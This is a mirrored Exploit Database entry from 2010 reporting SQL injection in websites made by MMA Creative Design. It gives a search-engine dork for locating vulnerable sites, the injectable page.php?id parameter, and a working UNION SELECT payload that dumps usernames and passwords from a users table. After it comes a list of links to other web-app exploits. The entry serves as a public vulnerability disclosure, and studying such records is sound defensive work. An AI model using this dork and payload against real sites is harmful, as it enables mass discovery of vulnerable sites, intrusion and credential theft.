MMA Creative Design – SQL Injection

Exploit Database
12 阅读

作者： XroGuE

日期： 2010-05-23
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/12706/

=========================================================
MMA Creative Design SQL Injection Vulnerability
=========================================================
##########################################
# Name: MMA Creative Design SQL Injection Vulnerability
# Date: 2010-05-23
# vendor: www.mmacreative.com
# Author: Ashiyane Digital Security Team
# Discovered By: XroGuE
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: www.Ashiyane.org
##########################################

[+] Dork: intext:"Design by MMA Creative"

[+] Vulnerability: http://[site]/[path]/page.php?id=[SQLi]

[+] Demo: http://server/authors.php?id=-999+UNION+SELECT+1,2,group_concat(id,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11,12+from+users


##########################################

last Exploits
MMA Creative Design – SQL Injection的更多信息

PHPJabbers Vacation Packages Listing 2.0 – Multiple Vulnerabilities：
Hindu Matrimonial Script – Authentication Bypass：
WUZHI CMS 4.1.0 – ‘form[qq_10]’ Cross-Site Scripting：
PHPscripte24 Preisschlacht Liveshop System – ‘index.php?aid’ SQL Injection：
plx Ad Trader 3.2 – Authentication Bypass：
Radiant CMS 1.1.3 – Multiple Persistent Cross-Site Scripting Vulnerabilities：
WordPress Plugin Work-The-Flow 1.2.1 – Arbitrary File Upload：
Joomla! Component Appointment 1.1 – SQL Injection：